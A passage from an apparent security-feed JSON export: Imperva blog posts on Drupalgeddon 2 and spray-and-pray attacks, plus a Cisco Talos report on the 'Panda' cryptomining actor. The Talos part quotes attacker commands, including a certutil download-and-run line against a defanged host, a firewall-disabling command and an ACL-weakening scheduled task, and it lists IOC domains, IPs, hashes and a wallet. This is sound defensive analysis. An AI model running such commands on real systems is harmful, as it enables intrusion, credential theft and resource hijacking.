web application code, your ISP to protect you from a DDoS attack, or your compliance audit checkbox to protect you from a data breach. The threat landscape has progressed far beyond these notions.\n\n### What can security practitioners do?\n\nWe strongly recommend working with [cybersecurity experts](<https://www.imperva.com/contact-us/>) to accurately evaluate your specific threat landscape and help you build a sustainable data security strategy for today and the future.\n\nThe post [2021 in Review, Part 2: 5 Top Cybersecurity Stories](<https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T12:03:19", "type": "impervablog", "title": "2021 in Review, Part 2: 5 Top Cybersecurity Stories", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-29T12:03:19", "id": "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "href": "https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-27T04:45:34", "description": "Ever since March 28th, when Drupal published a patch for a RCE named Drupalgeddon 2.0 (SA-CORE-2018-002/[CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)), Imperva has been monitoring our cloud looking for hackers\u2019 attempts to exploit the vulnerability, but found nothing. Until today.\n\nIt somehow seems fitting that nefarious activity picked up today, Friday the 13th. After a [POC exploit](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) was released, our monitoring services showed that hackers are finally starting to catch up! Since the RCE exploit was publicly disclosed two weeks ago, they could have been working on their own exploits, but didn\u2019t.\n\n## Lazy Hackers\n\nAs usual when exploits become known, we go into hyper-awareness mode looking for security events (and of course, protecting our customers), but no events were identified. Not a single attack. We rang to some of our teammates looking for answers, asking if they deleted events, but no\u2014it\u2019s just simply that no one attempted to exploit this newfound bug and it took them two whole weeks to reverse the patch.\n\nIt appeared every one of the black hats was waiting for someone else to do the research and share the exploit. Perhaps most hackers don\u2019t care for the actual work of finding ways to exploit a vulnerability. They just wait until something is public and then use it to attack. Before that, we saw almost no traffic whatsoever!\n\n## Attack Data\n\nThe chart below is just the beginning of the numbers we\u2019re now seeing in our cloud, and they are continuing to rise (Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-date.png>)\n\n_Figure 1: Attacks by date_\n\nTo this point, we have seen 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets (Figure 2).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-distribution-type.png>)\n\n_Figure 2: Attacks by distribution type_\n\nAlso, most of the attacks originated from the US (53%) and China (45%) (Figure 3).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-geo.png>)\n\n_Figure 3: Location source of attacks_\n\n## Imperva Customers Protected\n\nWe applied a virtual patch to Imperva SecureSphere and Incapsula WAF customers within hours of identifying the RCE vulnerability.\n\nIn addition to our zero-day protection rules that spotted this attack, we also published a new dedicated security rule to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T19:13:25", "type": "impervablog", "title": "Drupalgeddon 2.0: Are Hackers Slacking Off?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T19:13:25", "id": "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "href": "https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-13T21:29:37", "description": "\n\nAttacks on applications can be divided into two types: targeted attacks and \u201cspray and pray\u201d attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization\u2019s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or [sold on the dark web](<https://medium.com/beyond-the-perimeter/over-750-000-debit-and-credit-cards-for-sale-found-on-the-deep-web-434e050ac59f>). Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack. \n\nOne famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became [widely available](<https://github.com/dreadlocked/Drupalgeddon2>), which caused the [number of attacks on Drupal sites to explode](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>).\n\nThe ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.\n\n**Identifying Spray and Pray Attacks in Attack Analytics **\n\n[Attack Analytics](<https://www.imperva.com/products/attack-analytics/>), launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.\n\nWe recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below. \n\n_Figure 1: Attack Analytics Dashboard_\n\nClicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to login to the console and use the \u201cHow common\u201d filter.\n\n_Figure 2: Attack Analytics Many Customers Filter_\n\n \n\nA closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).\n\n_Figure 3: Attack Analytics Incident Insights_\n\n**How Our Algorithm Works**\n\nThe algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When there are similar incidents across a large number of customers in a close amount of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:\n\n * The attack source: Network source (IP/Subnet), Geographic location\n * The attack target: URL, Host, Parameters\n * The attack time: Duration, Frequency\n * The attack type: Triggered rule\n * The attack tool: Tool name, type & parameters \n\nIn some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. When it is a distributed attack, the origin of the attack is not relevant, while other factors are relevant. In many cases, a spray and pray attack will be aimed at the same group of URLs.\n\nAnother significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.\n\n**Results and Findings**\n\nThe Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.\n\n_Figure 4: Spray & Pray Incidents Spread _\n\nHere\u2019s an interesting example - a spray and pray attack from a single IP that attacked 1,368 customers in the same 3 consecutive days with the same vulnerability scanner, LTX71. We\u2019ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URLs scan on our customers resources - an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files on more than 50 different customers with a [cURL](<https://www.hackingarticles.in/web-application-penetration-testing-curl/>). And the list goes on.\n\nFocusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers. \n\n_Figure 5: Single Source Spray & Pray Accounts Affected_\n\n**More Actionable Insights Coming**\n\nIdentifying spray and pray attacks is a great example of using the intelligence from Imperva\u2019s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future. \n\nThe post [How Imperva's New Attack Crowdsourcing Secures Your Business's Applications](<https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-13T12:52:46", "type": "impervablog", "title": "How Imperva\u2019s New Attack Crowdsourcing Secures Your Business\u2019s Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-02-13T12:52:46", "id": "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "href": "https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talosblog": [{"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. \n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 